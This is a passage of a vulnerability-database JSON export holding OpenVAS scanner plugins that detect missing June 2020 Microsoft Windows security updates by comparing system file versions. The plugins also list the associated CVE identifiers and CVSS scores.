\"CVE-2020-1334\", \"CVE-2020-1348\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-07-17 05:57:41 +0000 (Fri, 17 Jul 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-06-10 08:52:23 +0530 (Wed, 10 Jun 2020)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4561602)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4561602\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\n on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to:\n\n - An error when the Windows kernel fails to properly handle objects in memory.\n\n - An error when the Windows GDI component improperly discloses the contents of its\n memory.\n\n - An error when the Windows Runtime improperly handles objects in memory.\n\n - An error in the way that the VBScript engine handles objects in memory.\n\n Please see the references for more information about the vulnerabilities.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to execute arbitrary code, elevate privileges, disclose sensitive information and\n conduct denial of service attacks.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows 10 Version 1709 for 32-bit Systems\n\n - Microsoft Windows 10 Version 1709 for x64-based Systems\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. 
Please see\n the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4561602\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win10:1, win10x64:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath)\n exit(0);\n\ndllVer = fetch_file_version(sysPath:sysPath, file_name:\"Ntoskrnl.exe\");\nif(!dllVer)\n exit(0);\n\nif(version_in_range(version:dllVer, test_version:\"10.0.16299.0\", test_version2:\"10.0.16299.1931\")) {\n report = report_fixed_ver(file_checked:sysPath + \"\\Ntoskrnl.exe\",\n file_version:dllVer, vulnerable_range:\"10.0.16299.0 - 10.0.16299.1931\");\n security_message(data:report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-21T19:51:39", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-1244", "CVE-2020-1253", "CVE-2020-1073", "CVE-2020-1203", "CVE-2020-1277", "CVE-2020-1207", "CVE-2020-1287", "CVE-2020-1237", "CVE-2020-1272", "CVE-2020-1300", "CVE-2020-1276", "CVE-2020-0916", "CVE-2020-1235", "CVE-2020-1290", "CVE-2020-1220", "CVE-2020-1278", "CVE-2020-1263", "CVE-2020-1310", "CVE-2020-1251", "CVE-2020-1274", "CVE-2020-1301", "CVE-2020-1254", "CVE-2020-1212", "CVE-2020-1280", "CVE-2020-1211", "CVE-2020-1279", "CVE-2020-1213", "CVE-2020-1219", "CVE-2020-1306", "CVE-2020-1305", "CVE-2020-1160", "CVE-2020-1236", "CVE-2020-1266", "CVE-2020-1311", "CVE-2020-1258", "CVE-2020-1317", 
"CVE-2020-1334", "CVE-2020-1259", "CVE-2020-1257", "CVE-2020-0986", "CVE-2020-1262", "CVE-2020-1215", "CVE-2020-1199", "CVE-2020-1231", "CVE-2020-1281", "CVE-2020-1255", "CVE-2020-1232", "CVE-2020-1299", "CVE-2020-1302", "CVE-2020-1296", "CVE-2020-1222", "CVE-2020-1241", "CVE-2020-1216", "CVE-2020-1292", "CVE-2020-1234", "CVE-2020-1247", "CVE-2020-1304", "CVE-2020-1324", "CVE-2020-1312", "CVE-2020-1271", "CVE-2020-1246", "CVE-2020-1261", "CVE-2020-1348", "CVE-2020-1314", "CVE-2020-1282", "CVE-2020-1208", "CVE-2020-1204", "CVE-2020-1239", "CVE-2020-1214", "CVE-2020-1269", "CVE-2020-1233", "CVE-2020-1194", "CVE-2020-0915", "CVE-2020-1162", "CVE-2020-1316", "CVE-2020-1294", "CVE-2020-1293", "CVE-2020-1238", "CVE-2020-1286", "CVE-2020-1242", "CVE-2020-1264", "CVE-2020-1196", "CVE-2020-1309", "CVE-2020-1315", "CVE-2020-1230", "CVE-2020-1201", "CVE-2020-1270", "CVE-2020-1202", "CVE-2020-1291", "CVE-2020-1260", "CVE-2020-1217", "CVE-2020-1197", "CVE-2020-1283"], "description": "This host is missing a critical security\n update according to Microsoft KB4561608", "modified": "2020-07-16T00:00:00", "published": "2020-06-10T00:00:00", "id": "OPENVAS:1361412562310817142", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310817142", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4561608)", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or 
FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.817142\");\n script_version(\"2020-07-16T11:59:37+0000\");\n script_cve_id(\"CVE-2020-0915\", \"CVE-2020-0916\", \"CVE-2020-0986\", \"CVE-2020-1073\",\n \"CVE-2020-1160\", \"CVE-2020-1162\", \"CVE-2020-1194\", \"CVE-2020-1196\",\n \"CVE-2020-1197\", \"CVE-2020-1199\", \"CVE-2020-1201\", \"CVE-2020-1202\",\n \"CVE-2020-1203\", \"CVE-2020-1204\", \"CVE-2020-1207\", \"CVE-2020-1208\",\n \"CVE-2020-1211\", \"CVE-2020-1212\", \"CVE-2020-1213\", \"CVE-2020-1214\",\n \"CVE-2020-1215\", \"CVE-2020-1216\", \"CVE-2020-1217\", \"CVE-2020-1219\",\n \"CVE-2020-1220\", \"CVE-2020-1222\", \"CVE-2020-1230\", \"CVE-2020-1231\",\n \"CVE-2020-1232\", \"CVE-2020-1233\", \"CVE-2020-1234\", \"CVE-2020-1235\",\n \"CVE-2020-1236\", \"CVE-2020-1237\", \"CVE-2020-1238\", \"CVE-2020-1239\",\n \"CVE-2020-1241\", \"CVE-2020-1242\", \"CVE-2020-1244\", \"CVE-2020-1246\",\n \"CVE-2020-1247\", \"CVE-2020-1251\", \"CVE-2020-1253\", \"CVE-2020-1254\",\n \"CVE-2020-1255\", \"CVE-2020-1257\", \"CVE-2020-1258\", \"CVE-2020-1259\",\n \"CVE-2020-1260\", \"CVE-2020-1261\", \"CVE-2020-1262\", \"CVE-2020-1263\",\n \"CVE-2020-1264\", \"CVE-2020-1266\", \"CVE-2020-1269\", \"CVE-2020-1270\",\n \"CVE-2020-1271\", \"CVE-2020-1272\", \"CVE-2020-1274\", \"CVE-2020-1276\",\n \"CVE-2020-1277\", \"CVE-2020-1278\", \"CVE-2020-1279\", \"CVE-2020-1280\",\n \"CVE-2020-1281\", \"CVE-2020-1282\", \"CVE-2020-1283\", \"CVE-2020-1286\",\n \"CVE-2020-1287\", \"CVE-2020-1290\", \"CVE-2020-1291\", \"CVE-2020-1292\",\n \"CVE-2020-1293\", \"CVE-2020-1294\", \"CVE-2020-1296\", \"CVE-2020-1299\",\n \"CVE-2020-1300\", \"CVE-2020-1301\", \"CVE-2020-1302\", \"CVE-2020-1304\",\n 
\"CVE-2020-1305\", \"CVE-2020-1306\", \"CVE-2020-1309\", \"CVE-2020-1310\",\n \"CVE-2020-1311\", \"CVE-2020-1312\", \"CVE-2020-1314\", \"CVE-2020-1315\",\n \"CVE-2020-1316\", \"CVE-2020-1317\", \"CVE-2020-1324\", \"CVE-2020-1334\",\n \"CVE-2020-1348\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-07-16 11:59:37 +0000 (Thu, 16 Jul 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-06-10 08:52:23 +0530 (Wed, 10 Jun 2020)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4561608)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4561608\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\n on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to:\n\n - An error when the Windows kernel fails to properly handle objects in memory.\n\n - An error when the Windows GDI component improperly discloses the contents of its\n memory.\n\n - An error when the Windows Runtime improperly handles objects in memory.\n\n - An error in the way that the VBScript engine handles objects in memory.\n\n Please see the references for more information about the vulnerabilities.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to execute arbitrary code, elevate privileges, disclose sensitive information, bypass\n security restrictions, conduct spoofing and denial of service attacks.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows 10 Version 1809 for 32-bit Systems\n\n - Microsoft Windows 10 Version 1809 for x64-based Systems\n\n - Microsoft Windows Server 2019\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. 
Please see\n the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4561608\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win10:1, win10x64:1, win2019:1) <= 0)\n exit(0);\n\nsysPath = smb_get_system32root();\nif(!sysPath)\n exit(0);\n\ndllVer = fetch_file_version(sysPath:sysPath, file_name:\"drivers\\Dxgkrnl.sys\");\nif(!dllVer)\n exit(0);\n\nif(version_is_less(version:dllVer, test_version:\"10.0.17763.1282\"))\n{\n report = report_fixed_ver(file_checked:sysPath + \"\\drivers\\Dxgkrnl.sys\",\n file_version:dllVer, vulnerable_range:\"Less than 10.0.17763.1282\");\n security_message(data:report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-21T19:51:35", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-1253", "CVE-2020-1073", "CVE-2020-1203", "CVE-2020-1207", "CVE-2020-1287", "CVE-2020-1237", "CVE-2020-1272", "CVE-2020-1300", "CVE-2020-1276", "CVE-2020-0916", "CVE-2020-1235", "CVE-2020-1290", "CVE-2020-1220", "CVE-2020-1278", "CVE-2020-1263", "CVE-2020-1310", "CVE-2020-1251", "CVE-2020-1274", "CVE-2020-1301", "CVE-2020-1254", "CVE-2020-1212", "CVE-2020-1280", "CVE-2020-1211", "CVE-2020-1279", "CVE-2020-1213", "CVE-2020-1219", "CVE-2020-1306", "CVE-2020-1305", "CVE-2020-1160", "CVE-2020-1236", "CVE-2020-1266", "CVE-2020-1311", "CVE-2020-1258", "CVE-2020-1317", "CVE-2020-1334", "CVE-2020-1259", 
"CVE-2020-1257", "CVE-2020-0986", "CVE-2020-1262", "CVE-2020-1215", "CVE-2020-1199", "CVE-2020-1231", "CVE-2020-1281", "CVE-2020-1255", "CVE-2020-1232", "CVE-2020-1299", "CVE-2020-1302", "CVE-2020-1222", "CVE-2020-1241", "CVE-2020-1216", "CVE-2020-1292", "CVE-2020-1234", "CVE-2020-1247", "CVE-2020-1304", "CVE-2020-1324", "CVE-2020-1312", "CVE-2020-1271", "CVE-2020-1246", "CVE-2020-1261", "CVE-2020-1348", "CVE-2020-1314", "CVE-2020-1282", "CVE-2020-1208", "CVE-2020-1239", "CVE-2020-1214", "CVE-2020-1269", "CVE-2020-1233", "CVE-2020-1194", "CVE-2020-0915", "CVE-2020-1162", "CVE-2020-1316", "CVE-2020-1294", "CVE-2020-1293", "CVE-2020-1238", "CVE-2020-1286", "CVE-2020-1242", "CVE-2020-1264", "CVE-2020-1196", "CVE-2020-1309", "CVE-2020-1315", "CVE-2020-1230", "CVE-2020-1201", "CVE-2020-1270", "CVE-2020-1202", "CVE-2020-1291", "CVE-2020-1260", "CVE-2020-1217", "CVE-2020-1197", "CVE-2020-1283"], "description": "This host is missing a critical security\n update according to Microsoft KB4561621", "modified": "2020-07-17T00:00:00", "published": "2020-06-10T00:00:00", "id": "OPENVAS:1361412562310817145", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310817145", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4561621)", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.817145\");\n script_version(\"2020-07-17T05:57:41+0000\");\n script_cve_id(\"CVE-2020-0915\", \"CVE-2020-0916\", \"CVE-2020-0986\", \"CVE-2020-1073\",\n \"CVE-2020-1160\", \"CVE-2020-1162\", \"CVE-2020-1194\", \"CVE-2020-1196\",\n \"CVE-2020-1197\", \"CVE-2020-1199\", \"CVE-2020-1201\", \"CVE-2020-1202\",\n \"CVE-2020-1203\", \"CVE-2020-1207\", \"CVE-2020-1208\", \"CVE-2020-1211\",\n \"CVE-2020-1212\", \"CVE-2020-1213\", \"CVE-2020-1214\", \"CVE-2020-1215\",\n \"CVE-2020-1216\", \"CVE-2020-1217\", \"CVE-2020-1219\", \"CVE-2020-1220\",\n \"CVE-2020-1222\", \"CVE-2020-1230\", \"CVE-2020-1231\", \"CVE-2020-1232\",\n \"CVE-2020-1233\", \"CVE-2020-1234\", \"CVE-2020-1235\", \"CVE-2020-1236\",\n \"CVE-2020-1237\", \"CVE-2020-1238\", \"CVE-2020-1239\", \"CVE-2020-1241\",\n \"CVE-2020-1242\", \"CVE-2020-1246\", \"CVE-2020-1247\", \"CVE-2020-1251\",\n \"CVE-2020-1253\", \"CVE-2020-1254\", \"CVE-2020-1255\", \"CVE-2020-1257\",\n \"CVE-2020-1258\", \"CVE-2020-1259\", \"CVE-2020-1260\", \"CVE-2020-1261\",\n \"CVE-2020-1262\", \"CVE-2020-1263\", \"CVE-2020-1264\", \"CVE-2020-1266\",\n \"CVE-2020-1269\", \"CVE-2020-1270\", \"CVE-2020-1271\", \"CVE-2020-1272\",\n \"CVE-2020-1274\", \"CVE-2020-1276\", \"CVE-2020-1278\", \"CVE-2020-1279\",\n \"CVE-2020-1280\", \"CVE-2020-1281\", \"CVE-2020-1282\", \"CVE-2020-1283\",\n \"CVE-2020-1286\", \"CVE-2020-1287\", \"CVE-2020-1290\", \"CVE-2020-1291\",\n \"CVE-2020-1292\", \"CVE-2020-1293\", \"CVE-2020-1294\", \"CVE-2020-1299\",\n \"CVE-2020-1300\", \"CVE-2020-1301\", \"CVE-2020-1302\", \"CVE-2020-1304\",\n \"CVE-2020-1305\", \"CVE-2020-1306\", \"CVE-2020-1309\", \"CVE-2020-1310\",\n \"CVE-2020-1311\", \"CVE-2020-1312\", 
\"CVE-2020-1314\", \"CVE-2020-1315\",\n \"CVE-2020-1316\", \"CVE-2020-1317\", \"CVE-2020-1324\", \"CVE-2020-1334\",\n \"CVE-2020-1348\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-07-17 05:57:41 +0000 (Fri, 17 Jul 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-06-10 08:52:23 +0530 (Wed, 10 Jun 2020)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4561621)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4561621\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\n on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to:\n\n - An error when the Windows kernel fails to properly handle objects in memory.\n\n - An error when the Windows GDI component improperly discloses the contents of its\n memory.\n\n - An error when the Windows Runtime improperly handles objects in memory.\n\n - An error in the way Windows Error Reporting (WER) handles objects in memory.\n\n Please see the references for more information about the vulnerabilities.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to execute arbitrary code, elevate privileges, disclose sensitive information, bypass\n security restrictions, conduct spoofing and denial of service attacks.\");\n\n script_tag(name:\"affected\", value:\"Microsoft Windows 10 Version 1803 for 32-bit/x64-based Systems.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. 
Please see\n the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4561621\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win10:1, win10x64:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath)\n exit(0);\n\ndllVer = fetch_file_version(sysPath:sysPath, file_name:\"Ntoskrnl.exe\");\nif(!dllVer)\n exit(0);\n\nif(version_in_range(version:dllVer, test_version:\"10.0.17134.0\", test_version2:\"10.0.17134.1549\")) {\n report = report_fixed_ver(file_checked:sysPath + \"\\Ntoskrnl.exe\",\n file_version:dllVer, vulnerable_range:\"10.0.17134.0 - 10.0.17134.1549\");\n security_message(data:report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-21T19:51:39", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-1244", "CVE-2020-1253", "CVE-2020-1073", "CVE-2020-1203", "CVE-2020-1277", "CVE-2020-1207", "CVE-2020-1275", "CVE-2020-1287", "CVE-2020-1237", "CVE-2020-1272", "CVE-2020-1300", "CVE-2020-1276", "CVE-2020-0916", "CVE-2020-1235", "CVE-2020-1290", "CVE-2020-1220", "CVE-2020-1278", "CVE-2020-1263", "CVE-2020-1310", "CVE-2020-1251", "CVE-2020-1274", "CVE-2020-1301", "CVE-2020-1254", "CVE-2020-1212", "CVE-2020-1280", "CVE-2020-1211", "CVE-2020-1279", "CVE-2020-1273", "CVE-2020-1213", "CVE-2020-1219", "CVE-2020-1306", "CVE-2020-1305", "CVE-2020-1160", "CVE-2020-1236", "CVE-2020-1266", "CVE-2020-1311", 
"CVE-2020-1258", "CVE-2020-1317", "CVE-2020-1334", "CVE-2020-1307", "CVE-2020-1259", "CVE-2020-1257", "CVE-2020-0986", "CVE-2020-1262", "CVE-2020-1215", "CVE-2020-1209", "CVE-2020-1199", "CVE-2020-1231", "CVE-2020-1281", "CVE-2020-1313", "CVE-2020-1255", "CVE-2020-1232", "CVE-2020-1299", "CVE-2020-1302", "CVE-2020-1296", "CVE-2020-1222", "CVE-2020-1241", "CVE-2020-1216", "CVE-2020-1292", "CVE-2020-1234", "CVE-2020-1247", "CVE-2020-1304", "CVE-2020-1324", "CVE-2020-1312", "CVE-2020-1271", "CVE-2020-1246", "CVE-2020-1261", "CVE-2020-1348", "CVE-2020-1314", "CVE-2020-1282", "CVE-2020-1208", "CVE-2020-1204", "CVE-2020-1239", "CVE-2020-1214", "CVE-2020-1269", "CVE-2020-1233", "CVE-2020-1194", "CVE-2020-0915", "CVE-2020-1265", "CVE-2020-1268", "CVE-2020-1162", "CVE-2020-1316", "CVE-2020-1294", "CVE-2020-1293", "CVE-2020-1238", "CVE-2020-1286", "CVE-2020-1242", "CVE-2020-1206", "CVE-2020-1264", "CVE-2020-1196", "CVE-2020-1309", "CVE-2020-1315", "CVE-2020-1230", "CVE-2020-1201", "CVE-2020-1270", "CVE-2020-1248", "CVE-2020-1202", "CVE-2020-1291", "CVE-2020-1260", "CVE-2020-1217", "CVE-2020-1197", "CVE-2020-1283"], "description": "This host is missing a critical security\n update according to Microsoft KB4560960", "modified": "2020-07-17T00:00:00", "published": "2020-06-10T00:00:00", "id": "OPENVAS:1361412562310817140", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310817140", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4560960)", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This 
program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.817140\");\n script_version(\"2020-07-17T05:57:41+0000\");\n script_cve_id(\"CVE-2020-0915\", \"CVE-2020-0916\", \"CVE-2020-0986\", \"CVE-2020-1073\",\n \"CVE-2020-1160\", \"CVE-2020-1162\", \"CVE-2020-1194\", \"CVE-2020-1196\",\n \"CVE-2020-1197\", \"CVE-2020-1199\", \"CVE-2020-1201\", \"CVE-2020-1202\",\n \"CVE-2020-1203\", \"CVE-2020-1204\", \"CVE-2020-1206\", \"CVE-2020-1207\",\n \"CVE-2020-1208\", \"CVE-2020-1209\", \"CVE-2020-1211\", \"CVE-2020-1212\",\n \"CVE-2020-1213\", \"CVE-2020-1214\", \"CVE-2020-1215\", \"CVE-2020-1216\",\n \"CVE-2020-1217\", \"CVE-2020-1219\", \"CVE-2020-1220\", \"CVE-2020-1222\",\n \"CVE-2020-1230\", \"CVE-2020-1231\", \"CVE-2020-1232\", \"CVE-2020-1233\",\n \"CVE-2020-1234\", \"CVE-2020-1235\", \"CVE-2020-1236\", \"CVE-2020-1237\",\n \"CVE-2020-1238\", \"CVE-2020-1239\", \"CVE-2020-1241\", \"CVE-2020-1242\",\n \"CVE-2020-1244\", \"CVE-2020-1246\", \"CVE-2020-1247\", \"CVE-2020-1248\",\n \"CVE-2020-1251\", \"CVE-2020-1253\", \"CVE-2020-1254\", \"CVE-2020-1255\",\n \"CVE-2020-1257\", \"CVE-2020-1258\", \"CVE-2020-1259\", \"CVE-2020-1260\",\n \"CVE-2020-1261\", \"CVE-2020-1262\", \"CVE-2020-1263\", \"CVE-2020-1264\",\n \"CVE-2020-1265\", \"CVE-2020-1266\", \"CVE-2020-1268\", \"CVE-2020-1269\",\n \"CVE-2020-1270\", \"CVE-2020-1271\", \"CVE-2020-1272\", \"CVE-2020-1273\",\n \"CVE-2020-1274\", \"CVE-2020-1275\", \"CVE-2020-1276\", \"CVE-2020-1277\",\n \"CVE-2020-1278\", \"CVE-2020-1279\", \"CVE-2020-1280\", \"CVE-2020-1281\",\n 
\"CVE-2020-1282\", \"CVE-2020-1283\", \"CVE-2020-1286\", \"CVE-2020-1287\",\n \"CVE-2020-1290\", \"CVE-2020-1291\", \"CVE-2020-1292\", \"CVE-2020-1293\",\n \"CVE-2020-1294\", \"CVE-2020-1296\", \"CVE-2020-1299\", \"CVE-2020-1300\",\n \"CVE-2020-1301\", \"CVE-2020-1302\", \"CVE-2020-1304\", \"CVE-2020-1305\",\n \"CVE-2020-1306\", \"CVE-2020-1307\", \"CVE-2020-1309\", \"CVE-2020-1310\",\n \"CVE-2020-1311\", \"CVE-2020-1312\", \"CVE-2020-1313\", \"CVE-2020-1314\",\n \"CVE-2020-1315\", \"CVE-2020-1316\", \"CVE-2020-1317\", \"CVE-2020-1324\",\n \"CVE-2020-1334\", \"CVE-2020-1348\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-07-17 05:57:41 +0000 (Fri, 17 Jul 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-06-10 08:52:23 +0530 (Wed, 10 Jun 2020)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4560960)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4560960\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\n on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to,\n\n - An error when the Windows kernel fails to properly handle objects in memory.\n\n - An error when the Windows GDI component improperly discloses the contents of its\n memory.\n\n - An error when the Windows Runtime improperly handles objects in memory.\n\n - An error in the way that the VBScript engine handles objects in memory.\n\n Please see the references for more information about the vulnerabilities.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to execute arbitrary code, elevate privilges, disclose sensitive information and\n conduct denial of service attacks.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows 10 Version 1903 
for 32-bit/x64-based Systems\n\n - Microsoft Windows 10 Version 1909 for 32-bit/x64-based Systems\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"executable_version\");\n\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-gb/help/4560960\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win10:1, win10x64:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath)\n exit(0);\n\nfileVer = fetch_file_version(sysPath:sysPath, file_name:\"Kernel32.dll\");\nif(!fileVer)\n exit(0);\n\nif(version_in_range(version:fileVer, test_version:\"10.0.18362.0\", test_version2:\"10.0.18362.899\")) {\n report = report_fixed_ver(file_checked:sysPath + \"\\Kernel32.dll\",\n file_version:fileVer, vulnerable_range:\"10.0.18362.0 - 10.0.18362.899\");\n security_message(data:report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-21T19:51:35", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-1244", "CVE-2020-1253", "CVE-2020-1203", "CVE-2020-1277", "CVE-2020-1207", "CVE-2020-1275", "CVE-2020-1287", "CVE-2020-1237", "CVE-2020-1272", "CVE-2020-1300", "CVE-2020-1276", "CVE-2020-0916", "CVE-2020-1235", "CVE-2020-1290", "CVE-2020-1220", "CVE-2020-1278", "CVE-2020-1263", "CVE-2020-1251", "CVE-2020-1274", "CVE-2020-1301", "CVE-2020-1254", "CVE-2020-1212", "CVE-2020-1280", "CVE-2020-1211", "CVE-2020-1279", 
